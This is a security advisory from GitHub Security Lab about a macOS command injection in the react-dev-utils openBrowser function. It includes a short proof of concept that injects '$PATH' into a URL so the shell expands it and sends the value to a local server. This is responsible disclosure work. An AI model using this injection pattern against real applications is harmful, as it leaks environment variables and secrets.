Coordinated Disclosure Timeline

Summary

There exists a command injection, similar to CVE-2021-24033, in the react-dev-utils npm package, which is a part of Facebook’s facebook/create-react-app repository.

However, this vulnerability is less severe, as there is a sanitizer which prevents execution of shell scripts. But it is still possible to extract environment variables and send these to an arbitrary server. The exploit only works on Mac OS X.

Similarly, as noted in the CVE-2021-24033 advisory: Only when this function is manually invoked with user-provided values (i.e. by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you.

Product

npm package: react-dev-utils.
Part of the facebook/create-react-app repository.

Tested Version

11.0.4

Details

This is the vulnerable code: https://github.com/facebook/create-react-app/blob/master/packages/react-dev-utils/openBrowser.js#L94

The following PoC will expand the $PATH environment variable and send it to localhost:3000 on MacOS systems.

var openBrowser = require('react-dev-utils/openBrowser');

// The "$PATH" in the URL is expanded by the shell that runs the generated script.
if (openBrowser('http://localhost:3000/$PATH')) {
  console.log('The browser tab has been opened!');
}

The problem is that react-dev-utils writes the URL into a shell script and then executes that script, so environment variable references such as $PATH in the URL are expanded by the shell before the browser is opened.

Impact

Information Disclosure

Resources

CVE

Credit

This issue was discovered and reported by GitHub CodeQL team member @erik-krogh (Erik Krogh).

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-070 in any communication regarding this issue.